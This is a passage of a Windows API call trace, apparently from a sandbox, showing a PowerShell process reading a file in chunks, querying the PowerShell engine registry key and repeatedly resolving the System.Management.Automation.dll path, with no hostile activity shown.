	[0283.188] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.188] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.767] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.767] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.768] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.768] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.768] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.768] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.768] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.769] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.770] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.770] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.770] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.770] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.772] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.773] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.773] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.773] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.773] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.773] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.774] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.774] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.774] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.774] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.775] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.775] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.775] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.775] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.775] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.776] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.776] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.776] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.776] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.777] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.777] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.777] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.777] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.777] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0xf37, lpOverlapped=0x0) returned 1
	[0283.778] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7d107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7d107*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0283.779] ReadFile (in: hFile=0x1c8, lpBuffer=0x2e7da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x2e7da68*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0283.779] CloseHandle (hObject=0x1c8) returned 1
	[0283.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.779] SetErrorMode (uMode=0x1) returned 0x1
	[0283.779] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0283.779] SetErrorMode (uMode=0x1) returned 0x1
	[0283.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.779] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1c8) returned 0x0
	[0283.780] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0283.780] CoTaskMemAlloc (cb=0x5a) returned 0x2dde70
	[0283.780] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2dde70, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0283.780] CoTaskMemFree (pv=0x2dde70) 
	[0283.780] RegCloseKey (hKey=0x1c8) returned 0x0
	[0283.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.785] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xf9696392, Data2=0x4776, Data3=0x4c2f, Data4=([0]=0xbd, [1]=0x97, [2]=0xc9, [3]=0xbc, [4]=0xa9, [5]=0xb0, [6]=0x4e, [7]=0x47))) returned 0x0
	[0283.785] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x5e78b8b9, Data2=0x8f5c, Data3=0x4eb9, Data4=([0]=0xb4, [1]=0x4c, [2]=0x75, [3]=0x95, [4]=0x4e, [5]=0x4f, [6]=0x47, [7]=0xf2))) returned 0x0
	[0283.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.671] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xfd927cf7, Data2=0xd07b, Data3=0x4176, Data4=([0]=0xb6, [1]=0xb1, [2]=0x6d, [3]=0x8f, [4]=0x1, [5]=0x17, [6]=0xe0, [7]=0x6a))) returned 0x0
	[0284.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
